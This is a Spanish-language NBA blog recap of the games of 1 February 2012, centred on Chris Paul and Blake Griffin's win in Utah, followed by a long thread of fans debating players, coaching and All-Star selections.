La Crónica: Show de Paul y Griffin en la casa de Stockton y Malone

02 de February de 2012 por TheDeerHunter

Jornada completa. Extraordinarias actuaciones, marcadores de infarto, remontadas, sorpresas, palizones… Hoy lo tenemos todo.

Para empezar, primera victoria de los Clippers en Salt Lake City desde el año 2003. Ahora podríamos volver a decir aquello de que “Griffin cambia el mundo” pero lo más correcto hoy sería decir “CP3&Griffin cambian el mundo” porque lo de estos dos anoche fue un escándalo desde el primer alley-hoop que montaron en el segundo 5 de partido. En el bastión donde otro base y otro ala-pívot marcaron época exhibieron un cambio de siglo baloncestístico menos de dos décadas después de todo aquello. ¿Qué dirían Stockton y Malone si alguien les hubiera contado que los Clippers iban a ser potencia a temer, con una especie de versión “sci-fi” de ellos? Y no es que los locales dieran facilidades a la fiesta con un Jefferson sobresaliente, pero la diferencia entre Devin Harris+Millsap y sus pares anoche ronda el año-luz (107-105).

Después, dos sorpresas que cada día son menos sorprendentes (valga la redundancia). Los Bucks enseñaron los cuernos a Miami, a pesar de que LeBron y los suyos empezaron con 40 en el primer cuarto. Los ciervos ataron machos en defensa y Jennings tuvo uno de esos días inspirados en los que parece un demonio. Ojito a su rendimiento últimamente (97-105). Por su parte, los Bulls cedieron en una plaza tan complicada como lo es Philadelphia este curso (82-98).

Los Thunder volvieron a tocarle la cara a los campeones. Los Mavs ahora mismo no parecen estar en la misma liga y lo más noticioso del partido fueron los 10 pinchos de merluza de Ibaka. Nowitzki 2 de 15… (95-86). Orlando, en cambio, salió por un día de su crisis particular. Eso sí, por los pelos, ante una banda como Wizards, en un mal partido de Wall y gracias a un muy buen partido de Howard, Anderson y Reddick (103-109). Los Pacers no tuvieron demasiados problemas en Minneapolis (109-99) y los Spurs fueron capaces de remontar un partido complicado ante Houston (91-99).

Como decíamos hubo palizones salvajes. Los Blazers le endosaron a Bobcats la mayor humillación de la historia de la franquicia y eso que han “disfrutado” de equipos malos a rabiar (68-112). Muy perdidos van los empleados de Su Majestad. Los Raptors también se llevaron una muy gorda de Boston y en Canadá ya están pensando más en las cabezas que van a rodar que en los resultados de la campaña (64-100). Mala pinta la de Calderón, con lo bien que había empezado.

Para terminar dos maravillas en forma de base. Sin calificativos para la nueva lección de Steve Nash en New Orleans (y ojito con Greivis Vasquez, 120-103) ni para la de Deron Williams en la victoria de los Nets ante Detroit (96-99).

PREMIOS

MVP: Chris Paul se enteró de que los Clippers hacía 16 años que no ganaban en Utah y se puso el traje de faena para acabar con semejante mala racha: 34 puntos (12 en el último cuarto), 11 asistencias, 5 rebotes y 3 robos de balón. Su compañero Blake Griffin, objetivo de muchas de las asistencias de Paul, se fue a los 31 puntos, 14 rebotes asistencias y 3 tapones.

Rookie: Brandon Knight anotó 15 puntos a pesar de su 1 de 8 en triples. También cogió 5 rebotes y repartió 4 asistencias. Ricky Rubio se quedó en 10 puntos y 6 asistencias. En Washington, interesante partido de Shelvin Mack: 12 puntos y 4 asistencias.

Sorpresa: Greivis Vazquez va cogiendo protagonismo en los Hornets. Anoche, fue el mejor de su equipo con 20 puntos, 6 rebotes y 12 asistencias. E impresionante doble-doble de Serge Ibaka: ¡11 rebotes y 10 tapones!

Decepción: Los Raptors se quedaron en 64 puntos y los Bobcats en 68.  Se trata, sin duda, de los 2 peores equipos de la NBA en estos momentos. Los canadienses tienen la excusa de la baja de Andrea Bargnani pero lo de Charlotte es simplemente patético. Si hablamos de jugadores hay que fijarse en el 1 de 11 de Kemba Walker y el 1 de 12 de John Wall, al menos este último aportó en el resto de estadísticas.

Esfuerzo en vano: Lebron James llegó anoche a los 40 puntos pero se vio superado por los Milwaukee Bucks que empiezan a mostrarse como serios candidatos a los Playoffs del Este. Al Jefferson jugó pese a las molestias que arrastra en su tobillo y se fue a los 27 puntos, 12 rebotes y 4 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

49 comentarios a esta entrada

  1. dsromero dice:
    #1

    Griffin 14 asistencias????

    no serán rebotes?

      Citar

  2. LEmontus dice:
    #2

    Por fin parece que Skiles se ha hecho con el equipo. Ha dado en el clavo con las rotaciones y sobre todo ha sentado a Jackson (menudo lastre de tío). Jennings empieza a demostrar lo que muchos sabiamos que tenía apareciendo siempre en momentos importantes y mostrando regularidad en cada partido. Recuerdo que este foro le puso como el fallo de los Bucks cuando desde la lesión de bogut ha sido el jugador franquicia y respondiendo siempre bastante bien. Y las otras dos claves son claras el buen rendimiento de Gooden sustituyendo a Bogut (sobre todo en ataque, Bogut no ha vuelto a ser el mismo desde la lesión siendo en muchas ocasiones perjudicial para Bucks porque no mete una y se le siguen dando balones , aunque en defensa el mejor de la nba). Y los muchos jugadores buenos que tiene Bucks sin ser estrellas los Dunleavy Delfino Udrih ilyasova Leuer Mbah Livinsgton. Si no hay más contratiempos cosas rara en Milwaukee no debería haber problemas en coger PO y una vez dentro no creo que nadie quiera a los bucks como rival.

      Citar

  3. Rompe dice:
    #3

    Anda LEmontus, cuánto tiempo! Un poco ventajista tu regreso, pero se te echaba de menos hombre!

      Citar

  4. HeiNeKeN dice:
    #4

    Siempre que Jennings hace un partidazo aparece LEmontus xD

    Por cierto, ayer el Pacers-Wolves fue una patata de partido, hasta que hubo un encontronazo entre Granger y Love (con Beasley metiendose en medio y diciendo de todo, vaya no me lo esperaba) y Granger se puso modo “te vas a cagar” y destrozó a los lobitos.

    Adelman ayer muy mal en las rotaciones, dandole muchos minutos a Barea y Milicic que volvían de sus lesiones y jugaron fatal.

      Citar

  5. Diestro dice:
    #5

    HeiNeKeN:
    Siempre que Jennings hace un partidazo aparece LEmontus xD

    La verdad que hacia mucho que no comentaba por aqui. A ver si te seguimos viendo que sera que se sigue saliendo Jennings .

    HeiNeKeN:
    Adelman ayer muy mal en las rotaciones, dandole muchos minutos a Barea y Milicic que volvían de sus lesiones y jugaron fatal.

    Quizás esta pensando mas en los 4 enfrentamientos directos para p.o. con equipos del oeste que en los pacers o los nets. Adelman es un perro viejo, y con la sobrecarga de partidos supongo que prefiere mantener a los dos para recuperarlos para la rotacion, que intentar ganar todos los partidos y pagar luego la sobrecarga contra los rivales directos.

    Seguramente no sea asi, pero si yo dispusiera de un equipo que aunque va para arriba, va justito en rotacion, selecionaria los partidos en los que hay que competir y los que hay que simplemente jugar.

    Un saludo

      Citar

  6. Sancho88 dice:
    #6

    HeiNeKeN:
    Siempre que Jennings hace un partidazo aparece LEmontus xD

    Por cierto, ayer el Pacers-Wolves fue una patata de partido, hasta que hubo un encontronazo entre Granger y Love (con Beasley metiendose en medio y diciendo de todo, vaya no me lo esperaba) y Granger se puso modo “te vas a cagar” y destrozó a los lobitos.

    Adelman ayer muy mal en las rotaciones, dandole muchos minutos a Barea y Milicic que volvían de sus lesiones y jugaron fatal.

    Totalmente de acuerdo con la crítica a Adelman. En el tercer cuarto fue una vergüenza como gestionó al equipo, con Barea y Wes Johnson jugando fatal y muchos minutos, además del pakete de Derrick Williams (los del mock draft se merecen el cielo). Está claro que no puede quitar a la vez a Love y Rubio porque el equipo se resiente muchísimo. Si acaso, Barea que juegue como escolta, como base va perdidísimo y solo resta, en vez de sumar.

    Además del Minnesota-Indiana, también acabé viéndome a los Clippers en casa de los Jazz. Menudo partidazo!! Yo no diría tanto como comparar a CP3-Griffin con Stockton-Malone, porque les faltan muchos años, pero sí que fue evidente el grandísimo trabajo de pick&roll entre los dos. Son peligrosísimos. Y bueno, los últimos 5-6 minutos de partido que se marcó Paul, son un recital de fundamentos, resolución, inteligencia, y todos los adjetivos calificativos positivos que se le quieran poner. Menudo crack. Muy complicado ganar un partido solo en el Energy Arena, y no le quiero quitar méritos a Griffin y también a BIllups, que a pesar de no jugar demasiado bien, el último cuarto también supo templar emociones, pero ayer la victoria hay que apuntársela a Paul.

    Y para terminar, me vi al comienzo de la noche a Bobcats contra Blazers. Decir de un partido de la NBA que fue una pachanga, puede ser muy duro de decir. Pero anoche fue una pachanga. Y a pesar de que Bobcats lleva muchos partidos sin Magette y sin Augustin, no puede ser excusa. Diaw estuvo super mal y Henderson solo jugó 20 minutos. La clave fue que Bobcats no defendió absolutamente nada, y el señor Crawford se vio tirando solo en todas las ocasiones. Fue la clave emocional para Blazers, además de la defensa y la eficacia de Gerald Wallace, y el buen trabajo siempre de Aldridge. Está por volver Batum. Si el equipo jugase siempre así, nadie dudaría que serían cabezas de serie en el Oeste, pero es que verles jugar fuera de casa da vergüenza ajena. A mí me parecen un equipo de mentira, que se crecen con su afición pero fuera no saben ganar. Y vale que esto les pasa a muchos otros equipos, pero lo de estos tíos es endémico desde casi siempre, que yo recuerde

      Citar

  7. HisRoyalAirness dice:
    #7

    LEmontus Jennings puede ser de todo menos REGULAR.
    Y Bogut el mejor defensivamente de la liga? No me hagas reir…

    Con respecto a Wolves creo que las rotaciones de Adelman forman parte de un plan para que nadie se desconecte del equipo y se sientan implicados. Aunque es cierto que se podía ahorrar a MIlicic y Barea porque hicieron minutos lamentables. Pekovic mejora a Darko en TODO salvo en tapones, tiene unos movimientos en el poste bajo cojonudísimos y pelea los rebotes como un león.
    Y bueno Sancho, lo de que Derrick Williams es un paquete…es un rookier pero siempre que sale cumple, es cierto que hace tiros un poco absurdos pero para mí es de lo mejorcito de esta camada. Adelman le da pocos minutos porque lo ve verde pero es muy bueno atacando el aro, mucho.
    Lo de Wesley Johnson si que no lo entiendo porque es lamentable. Le da demasiados minutos y es un caso perdido

      Citar

  8. Esteban dice:
    #8

    williams lo mejorcito de la camada rookie? q has fumado tio?

      Citar

  9. Denise dice:
    #9

    Para mi Derrick Williams tampoco es muy bueno, solo que en una camada de rookies de ciegos, es uno de los pocos tuertos que hay. Su carrera supongo que será la de cuarta o quinta referencia de un equipo, un jugador tipo Thaddeus Young, , un buen jugador de equipo, pero tampoco una gran cosa comparandolo con otros nº2 de Drafts de otros años (sin incluir a Darko Milicic…)

      Citar

  10. Esteban dice:
    #10

    parece q d-will no quiere perderse el all star y cargo baterias, haciendo numeros gigantes, aunque sea para colarse por la ventana como tecer base, sin dudas cuando tiene ganas es quiza el segundo mejor base de la liga desp de cp-3

    otro q cargo pilas para estar es granger, madre de promediar 14 pp por partido, los ultimos 5 juegos anda por los 26 pp, gran adelanto

      Citar

  11. Esteban dice:
    #11

    Denise:
    Para mi Derrick Williams tampoco es muy bueno, solo que en una camada de rookies de ciegos, es uno de los pocos tuertos que hay. Su carrera supongo que será la de cuarta o quinta referencia de un equipo, un jugador tipo Thaddeus Young, , un buen jugador de equipo, pero tampoco una gran cosa comparandolo con otros nº2 de Drafts de otros años (sin incluir a Darko Milicic…)

    exacto, un jugador de rol quiza un buen sexto hombre, pero vamos es un n 2, sigue siendo poco, me quedo con nole, shumpert, brooks, knight y cuando aparezca valanciunas seguramente, ni hablar de irving q es palabra mayor

    en cuanto a young, estoy tentando a pensar lo mismo, pero no creo que con el fisico lento y torpe y grueso de williams pueda ser un alero en un futuro, mas vale puede ser una version desdibujada de brand, ya que sin dudas su puesto es de ala pivot

      Citar

  12. Sancho88 dice:
    #12

    Pues a mí me parece muy flojeras. No defiende y no le pone alma. O espabila o se le van a comer en esa liga

      Citar

  13. melo15 dice:
    #13

    Bueno yo opinare de Williams, cuando juegue un poco mas, porque me parece un jugador bastante bueno

      Citar

  14. Esteban dice:
    #14

    melo15:
    Bueno yo opinare de Williams, cuando juegue un poco mas, porque me parece un jugador bastante bueno

    quiza cuando juegue un poco mas tendra 2 o 3 años en la liga, por lo que ya no importara si fue buen o mal rookie

    en cuando a griffin y paul como stckton y malone, creo que no llegaron a ese nivel, y es probable que no lleguen, sobretodo si el fisico de griffin es medio endeble, aunque para mi superaran a otra extravagante dupla como payton y kemp, son mas de su estilo me parece, sobretodo griffin que es mas parecido a kemp q a malone

      Citar

  15. Sancho88 dice:
    #15

    fisico de griffin medio endeble? puedes esplicar eso Esteban?

      Citar

  16. Len Bias dice:
    #16

      Citar

  17. Esteban dice:
    #17

    digo, no se perdio ya un año entero por una lesion? lo eh visto jugar on coderas varias veces tamb, y pegando esos brincos, me recuerda a un tal vince carter
    ojala me equivoque, por q como ya han notado me he hecho casi fan de los clippers

      Citar

  18. Sancho88 dice:
    #18

    Mira, pues ni me había dado cuenta. Es cierto macho. Pero como ha hecho las dos temporadas que ha hecho ni me acordaba de aquella lesión

      Citar

  19. LEmontus dice:
    #19

    HisRoyalAirness: LEmontus Jennings puede ser de todo menos REGULAR.Y Bogut el mejor defensivamente de la liga? No me hagas reir…Con respecto a Wolves creo que las rotaciones de Adelman forman parte de un plan para que nadie se desconecte del equipo y se sientan implicados. Aunque es cierto que se podía ahorrar a MIlicic y Barea porque hicieron minutos lamentables. Pekovic mejora a Darko en TODO salvo en tapones, tiene unos movimientos en el poste bajo cojonudísimos y pelea los rebotes como un león.Y bueno Sancho, lo de que Derrick Williams es un paquete…es un rookier pero siempre que sale cumple, es cierto que hace tiros un poco absurdos pero para mí es de lo mejorcito de esta camada. Adelman le da pocos minutos porque lo ve verde pero es muy bueno atacando el aro, mucho.Lo de Wesley Johnson si que no lo entiendo porque es lamentable. Le da demasiados minutos y es un caso perdido

    Chavalote van 20 partidos y promedia 21-5 con procentajes muy buenos… si un tío que promedia eso no es regular ….. y sí bogut es de los mejores pivots defendiendo si duda alguna.(recuerdo que defender no es sólo ahcer tapones, aunque Bogut también es de los mejores taponadores). El problema es que todo lo que metía antes del empujoncito de Amare ahora lo falla o acaba en pérdida.

    Que conste que siempre he comentado pero cada vez menos porque la verdad considero que muy pocos saben verdaderamente de NBA , sin acritud. Además no es el primer partido bueno ni el mejor de Jennigs. Y si he comentado ahora es porque parece que por fin los Bucks ha encontrado su juego.

      Citar

  20. Sempren dice:
    #20

    Vamos, acabas reconociendo que te puede el ventajismo, y es la razón de comentar. Ok.

    En otro orden de cosas… sí es cierto que Griffin se perdió todo su primer año, pero después de eso, lo jugó todo o prácticamente todo, así que dudo que sea endeble físicamente (más bien todo lo contrario).
    El tema coderas puede ser más tema de marketing que otra cosa…

      Citar

  21. ralage dice:
    #21

    Pues aparte del 30-10 que se marco, ayer Nash se convirtió en el mayor asistente de la historia de los Suns,estuvo genial la retrasmisión, poniendo imágenes de su primera asistencia allá por 1996

      Citar

  22. simon dice:
    #22

    LEmontus: Chavalote van 20 partidos y promedia 21-5 con procentajes muy buenos… si un tío que promedia eso no es regular ….. y sí bogut es de los mejores pivots defendiendo si duda alguna.(recuerdo que defender no es sólo ahcer tapones, aunque Bogut también es de los mejores taponadores). El problema es que todo lo que metía antes del empujoncito de Amare ahora lo falla o acaba en pérdida.

    Que conste que siempre he comentado pero cada vez menos porque la verdad considero que muy pocos saben verdaderamente de NBA , sin acritud. Además no es el primer partido bueno ni el mejor de Jennigs. Y si he comentado ahora es porque parece que por fin los Bucks ha encontrado su juego.

    Hombre Jennings aun no es un jugador que podamos decir que es regular, lo mismo se marca 3 partidos seguidos en 30 puntos que luego se hace varios de 10 puntitos… cada vez es mas regular pero aun podemos decir que es un jugador un poco irregular.

      Citar

  23. LEmontus dice:
    #23

    simon: Hombre Jennings aun no es un jugador que podamos decir que es regular, lo mismo se marca 3 partidos seguidos en 30 puntos que luego se hace varios de 10 puntitos… cada vez es mas regular pero aun podemos decir que es un jugador un poco irregular.

    Este año no más de 3 veces se habrá quedado en menos de 10 puntos está claro que para poder decir qe es un tío regular tiene que hacer la temporada entera siendo regular, pero hasta ahora increible cn su equipo en PO.

      Citar

  24. Esteban dice:
    #24

    no creo q los bucks lleguen a PO, en algun momento deben reaccionar los knicks, con o sin D`antoni

      Citar

  25. Sancho88 dice:
    #25

    Me da especialmente asco el tipo de comentarios de… no tenéis nivel para hablar de tal o cual, o no hables porque yo lo sé todo de NBA y tu no. Lemontus tío, creo que no has pillado la onda de la página. Yo creo que aquí de lo que se trata es de exponer cada uno su opinión, comentario, sabiduría, y que se vaya comentando. Si todos hiciéramos como tú, esto estaría desierto. Yo creo que todo el mundo tiene algo que aportar, y que no hace falta ser Antoni Daimiel para hablar de la NBA. Lo importante es amar el baloncesto y aprender. Y aquí se aprende muchísimo. De hecho, nadie nace experto en nada, y si todo el mundo tuviera el miedo de equivocarse o de no escribir porque piensa que no sabe lo suficiente, al final acabarían comentado cuatro. Menudo aburrimiento, no crees? El tiempo de Jovellanos y su adoctrinamiento ya terminó, ahora todo el mundo puede decir lo que le apetezca siempre y cuando no se meta con el resto. Yo me he sentido ofendido con tu comentario, porque es el típico comentario que veo en otros medios, en plan… yo no comento aquí porque nadie sabe de tal o cual tema. Pues mira chico, si lo sabes tú todo, escribe las crónicas, los análisis, participa en las porras, pero respeta al resto que escribimos aquí para pasarlo bien y aprender, aunque no sepamos tanto como tú. Y que conste que es una crítica constructiva, porque a este foro no se le hace justicia diciendo que la gente no tiene ni idea. Me parece un argumento muy chabacano por tu parte

      Citar

  26. Esteban dice:
    #26

    tranquilo sancho!!! el comentario de que no saben nada fue para mi ejejeje

      Citar

  27. Sancho88 dice:
    #27

    All-Star Game de Orlando. ¡Marc Gasol suplente! Bueno, estaba cantado, pero es una noticia alegre. Además, se confirma lo de Westbrook (Scott Brooks ha cumplido nuestras sospechas), y atenció porque hay sorpresa (por lo menos, para mí). Steve Nash va, Kyle Lowry se cae de la lista. Para mí, aunque ha bajado algo sus prestaciones últimamente, se merecía ir… En fin.

    Quinteto del Oeste: Chris Paul, Kobe Bryant, Kevin Durant, Blake Griffin, Andrew Bynum (poner a estos cinco en los JJ.OO. a mí me haría hacerme pipí en las bragas).

    Quinteto del Este: Derrick Rose, Dwayne Wade, Carmelo Anthony, Lebron James, Dwight Howard. (Creo que Anthony es el único tipo de los titulares en ambas conferencias que no se merecía estar, siento la opinión Melo).

    Suplentes en el Oeste: Russell Westbrook, Steve Nash (se cae Lowry, como he comentado, y la opción Ricky ni siquiera ha contado en la decisión de Brooks); LaMarcus Aldridge, Kevin Love (se hace justicia divina con Aldridge, CUANTO TIEMPO LLEVA MERECIENDO ESTE PREMIO. Descartan a Pau, supuestamente, porque no sería lógico meter a tres tipos de Lakers yendo octavos de la Conferencia); Marc Gasol (oh, yes!!). // Invitaciones: Paul Millsap y Ty Lawson… no coments. Osea, que además de tirar a Lowry, ponen de reserva a Lawson en vez de a él, MENUDA VERGÜENZA. Creo que esto de invitaciones será que son el undécimo y duodécimo hombre, por lo que sí que van, no?

    Suplentes en el Este: JoJo, Rajon Rondo (Thibbodeau se carga a Deron Williams de manera tan brutal que ni aparece entre los reservas, siquiera, y sí lo hace Brandon Jennings; conflicto de intereses/criterios entre él y ‘Coach K’. Tampoco va Irving. Yo creo que ahora ya se puede sacar visión claramente discriminatoria de Krizcewski hacia Rondo en la preselección de los JJ.OO. por aquel tema del Mundial, pues creo que este nombramiento hace justicia con él, no así su no inclusión en la lista de los Juegos Olímpicos y sí la inclusión de Chauncey Billus, que por cierto también desaparece de la lista de Thibbodeau); Chris Bosh, Paul Pierce (pueden los galones de Pierce, yo creo que se merecía la plaza Granger); Roy Hibbert (no va Spencer Hawes ni Ryan Anderson). // Invitados: Jennings, Iguodala.

    *Tema invitados. Los diez tipos entre titulares y suplentes creo que quedan claros. Mi duda viene acerca de las dos ‘Wild Cards’, si son vinculantes directamente o ahora tienen que elegir cada entrenador a dos jugadores más. Espero que me resolváis esta duda. Muchas gracias

      Citar

  28. Sancho88 dice:
    #28

    Por cierto, corrijo, porque lo único confirmado son los quintetos. Lo otro me lo he inventado. xd. No, es coña, lo otro son elucubraciones

      Citar

  29. Sancho88 dice:
    #29

    Reaparece Thornton, y el señor Snoop Dog le ha dado un rodillazo en sus partes, que quizá le tenga fuera alguna semana más. Yo soy pro Gerald Wallace, pero a veces los jugadores defensivos tienen mañas un tanto sucias. No es intencionado, ni nada parecido, pero desde luego muy evitable lo que ha hecho…

      Citar

  30. Esteban dice:
    #30

    wow viendo los clippers y las piernas? los esta vapuleando denver, con sus titulares en cancha, y si la solucion en la banca es que entrew Mo, por cp3 estan al horno

    ya dos movidas debe hacer ese equipo

    se puede aplicar ahora la anmistia? gomes candidatazo, una preg, solo es para aquellos conmtratos anteriores al convenio no? en ese caso solo podrian aplicarsela a gomes o Mo, lo que sucede es que aunque Mo cobre 90 millones, el produce, gomes cobra 4 esta y la proxima y es un 0 a la izquierda

      Citar

  31. Sancho88 dice:
    #31

    Y los Kings ganando surrealistamente, perdiendo la última bola y dejando que Portland tirase dos triples para empatar. No han entrado de milagro… De veras, me quieren matar de un disgusto. xd

      Citar

  32. melo15 dice:
    #32

    Bueno, no he comentado hoy pero voy a escribir una buena parrafada.
    Lemontus tio, si solo comentas cuando las cosas le van bien a tu equipo eres un nenaza, yo estoy aqui defendiendo a Melo y a mis Rookies aunque no tenga razon.
    Sobre el all-star me parece justo, no creo que Ricky tenga que ir este años, solo van en el año Rookie los que se marcan partidazos muy bestias!! En el Este esta todo bien, lo de Melo, bueno tampoco hay ala-pivots muy buenos asi que.. Tampoco creo que tendria que ir Jennings, me parece muchisimo mejor Deron, por lo demas me parecen bien, en el oeste todo bien, aunque Lowry lo merecia, y Pau no, y digo no porque juega de ala-pivot y esta haciendo pero temporada que Love, Aldridge y Griffin, quiza el en cambio de Milsap, pero no lo se.

      Citar

  33. Denise dice:
    #33

    Hombre, si ha vuelto Lemontus, aquel hombrecillo que poseía la verdad absoluta y que dijo hace como año y medio que Andrew Bogut era mejor que Dwight Howard!! xD

    Sobre el All-Star, como todos los años ultimamente, ni voto, ni me interesa quien va, ni lo pienso ver. En mi opinion, el All-Star es una gilipollez de fin de semana que solo vale para adornar el curriculum de los jugadores. El partido de los rookies vomitivo; el concurso de habilidades horroroso, ;el concurso donde participan un tio NBA, una tia WNBA y una leyenda, una verguenza ajena; el concurso de mates, un tongo donde gana el que mas interese que gane en ese momento; y el partido de las estrellitas, la porqueria y la basura mas grande que se puede ver en una cancha de baloncesto.
    Lo unico medio decente, el concurso de triples que es lo unico objetivo que hay, donde el que gana es el que se lo merece. Pero tampoco merece la pena verlo en directo, con ver un resumen a la mañana siguiente hay bastante.

    Cuándo llegará el ansiado día que quiten la basura del All-Star Weekend y pongan la “Stern Cup” (a lo Copa del rey”) y así habría mas equipos y jugadores motivados para coseguir un título.

      Citar

  34. Sancho88 dice:
    #34

    Hombre, una solución que se planteó sería cambiar el partido de las estrellas por un partido entre jugadores de Estados Unidos contra el resto del mundo. Creo que sería muy interesante ver qué pasaría, y más ahora que las fuerzas se van igualando bastante. Yo me veo los partidos porque me lo paso pipa con los mates que se hacen, y las jugadas guapas. Me encanta ver un partido que queda 170 a 180, o por el estilo. Competitivamente no se juegan nada, pero si lo pensamos, qué se juegan en temporada regular? Yo prefiero verme un partido así, un poco a lo loco, que a los Magic o a los Blazers jugando fuera de casa, que dan un poco de penica ajena. Y sobre los concursos, opino que están muy devaluados, que incluso el de triples ya no es lo mismo desde los que ganaba Stojakovic, o el histórico de Kapono metiendo 25-26 (no recuerdo bien), y en que se ha convertido en un espectáculo, pero como espectáculo está entretenido, hombre. Yo me lo paso bien, no sé si seré el único friki al que le pasa, xd. Además, este año ver el partido de Rookies Vs. Sophomores, con todos los jugadores mezclados y Shaquille echando a cara o cruz con Charles a ver quién elige primero, y luego ir eligiendo a dedo… madre de dios, eso no me lo pierdo ni de coña. Estos son capaces de ponerse la zamarra y salir a jugar con los jovenzuelos (qué no?? al tiempo…).

      Citar

  35. melo15 dice:
    #35

    Nunca llegara ese dia, porque para los americanos el all-star es para divertirse no para competir, si quisieran ya lo harian, pero lo que quieren es pasarselo bien, aunque un poco mas de seriedad vendria bien, aunque en los momentos finales se ponen en serio, como Lebron el año pasado, que casi remonta el partido el solo.
    Quien creeis que tiene mejor equipo??

      Citar

  36. melo15 dice:
    #36

    Cono que todos los jugadores mezclados??

      Citar

  37. melo15 dice:
    #37

    Cono que todos los jugadores mezclados??
    Si es lo que yo pienso es para no perderselo, aver quien escogen el ultimo jajjajajaja

      Citar

  38. Denise dice:
    #38

    Pero el USA vs resto del mundo sería un partidazo siempre y cuando se lo tomaran en serio, si va a ser un concurso de saltarines como el All-Star Game, para mi sería igual de basura.

    En un hipotetico enfrentamiento con , yo pondría a éstos:

    USA 5 inicial: Chris Paul, Kobe Bryant, Lebron James, Blake Griffin, Dwight Howard
    Banquillo: Deron Wiliams, Rajon Rondo, Dwyane Wade, Carmelo Anthony, Kevin Durant, Chris Bosh, Kevin Love

    Mundo 5 I: Steve Nash, Manu Ginobili, Luol Deng, Dirk Nowitzki, Pau Gasol
    Banquillo: Tony Parker, Danilo Gallinari, Nico Batum, Hedo Turkoglu, Luis Scola, Joakim Noah, Marc Gasol

      Citar

  39. simon dice:
    #39

    Por cierto creeis que Ricky Rubio tiene opciones para ir al concurso de habilidades? yo creo que sí, siempre buscan gente que ya esté alli seleccionada para algun partido, y Ricky da todo el perfil que pueden buscar. Habilidoso, mucho negocio y marketing a su lado y mucha expectación por verle.

      Citar

  40. Sancho88 dice:
    #40

    melo15:
    Nunca llegara ese dia, porque para los americanos el all-star es para divertirse no para competir, si quisieran ya lo harian, pero lo que quieren es pasarselo bien, aunque un poco mas de seriedad vendria bien, aunque en los momentos finales se ponen en serio, como Lebron el año pasado, que casi remonta el partido el solo.
    Quien creeis que tiene mejor equipo??

    Yo creo que ganará el Oeste, como el año pasado. Tienen mas equipo, y sobre todo, más banquillo. Son favoritos, a mi juicio

      Citar

  41. rumbero dice:
    #41

    Sancho88: Yo creo que ganará el Oeste, como el año pasado. Tienen mas equipo, y sobre todo, más banquillo. Son favoritos, a mi juicio

    Lo de tener más banquillo en el All-Star es un poco de broma. Más bien se trata de ver quienes son los que tienen más ganas de lucirse y llevarse el MVP. Yo creo que le toca al King, y por lo tanto apuesto por el Este

      Citar

  42. melo15 dice:
    #42

    Yo apuesto por el Este, la dupla Lebron-Melo es bestial, si jugaran en serio seria un partidazo brutal,

      Citar

  43. GreenPride dice:
    #43

    Gran partido de nuevo de los Clippers contra Utah. Este equipo es de los más divertidos de ver aunque sinceramente comparar a Paul-Griffin con Stockton-Malone todavía es muy fuerte. Para ello, tienen que llevar a su equipo a varias finales y a nivel individual sobre todo Griffin debe apreder a tirar. Tienen potencial para llegar a poder emularles, eso sí.
    Vi el Thunder-Mavs. El resumen es que los Mavs no van a ninguna parte con Robin Hood Nowitzki en el estado de forma en el que está. Tirando así de mal y sin ser amenaza ofensiva, los Mavs pierden su buque insignia y no les da para estar en la élte. De todas maneras en este partido tenían muchas bajas y yo creo que acabarán siendo de los que estarán ahí arriba.
    Sorprendente la temporada de Pacers y sobre todo Sixers que se comieron a los Bulls. Ambos están empatados con Heat y Bulls en lo alto del Este lo cual es mucho decir.
    Los Bobcats y los Raptors son probablemente los 2 peores equipos de la NBA. Calderón bastante mal, al igual que su equipo, creo que está llegando a ese punto en el que o lo traspasan o acabará aburrido de jugar en un equipo perdedor. En los Bobcats supongo que a Jordan sólo le salva su fama porque como GM se está cubriendo de gloria….

      Citar

  44. simon dice:
    #44

    Es un poco lo que dice Rumbero, ganará el que se lo tome ( un poquito ) más en serio. Para mi que gana el Este con Howard como MVP ( juega en casa y sabemos el peso que tiene eso ).
    Si fuera un partido que se jugara en serio todos los jugadores apostaría por el Oeste sin ninguna duda.

      Citar

  45. Ru dice:
    #45

    simon:
    Por cierto creeis que Ricky Rubio tiene opciones para ir al concurso de habilidades? yo creo que sí, siempre buscan gente que ya esté alli seleccionada para algun partido, y Ricky da todo el perfil que pueden buscar. Habilidoso, mucho negocio y marketing a su lado y mucha expectación por verle.

    Corregirme si me equivoco,pero a un rookie si que escogen tanto para el concurso de habilidades como para el Slam Dunk,creo que es una especie de regla no escrita aplicada desde hace dos temporadas…que me suenn las campañas de promoción que hacían los rookies,sobre todo para el de los mates(Joe Alexander,DeRozan…).Ricky apostaría 100 euros a que va al concurso de habilidades simon.

      Citar

  46. simon dice:
    #46

    Por cierto para mí los equipos titulares son justísimos. Quizá el único que no estoy del todo seguro es con Melo, debido a que este año no está muy fuerte y su equipo va mal, pero bueno, lo cierto es que tampoco hay nada mejor en aleros en el Este. Yo mismo lo voté por que no hay ni un ala-pivot bueno en el Este, es flipante. ( sin embargo ala-pivot del Oeste como: Tim D, Dirk, Lee, Cousins,Gasol, Nene, Al Jeffersson… se quedan fuera en el Oeste.

    De los posibles suplentes que pone en la pagina de la NBA, que ya los ha comentado sancho,
    en el OESTE a mi me sobra Lawson y me falta Gallinari ( se premia el trabajo de Denver igual pero con un jugador que a mi me parece el mejor de Denver ) La elección de Millsap me parece justísima. es el líder de ( para mí ) la mayor sorpresa hasta ahora de la competición )
    En el ESTE me parece correctísima es la que pondría yo. Granger ha mejorado estas dos ultimas semanas pero su temporada no esta siendo mejor ni que la de Bosh ni la de Pierce. Con JoJo se premia la temporada de Atlanta y la no elección de Williams me parece genial. la temporada de Williams me parece patética ( comprendo que en el equipo que está es complicado ) en forma y motivado es un top 5 en bases, el problema es que no está en forma ( ahora parece que va mejorando ) y ni mucho menos está motivado.

      Citar

  47. LEmontus dice:
    #47

    Lo de bogut lo sigo manteniendo porsupuesto, pero el bogut antes de la lesión. Y no solo Bogut Pau en forma también es mejo que Howard, pero esto hablando de partidos serios de PO, no de regular season que muchas veces juegan andando y es cuando más destacan los jugadores físicos.(Despues llega la hora de la verdad y pasa lo que pasa las defensas aumentan muchísimo cuesta mas entrar, cuesta mas coger rebotes ofensivos, cuesta mas meter canastas faciles y es entonces cuado Dirk gana a Lebron, cuando Pau y kobe ganan el anillo cuando nash o parker MvP…..) si está todo escrito pero solo algunos sabemos leerlo.

      Citar

  48. simon dice:
    #48

    Pareciendome Bogut un gran jugador, sobretodo antes de la lesión, me parece una sobrada lo que has dicho.

      Citar

  49. Len Bias dice:
    #49

    LEmontus no te cueles que Nash de MVP en los playoffs nada de nada.

      Citar

Deja un comentario

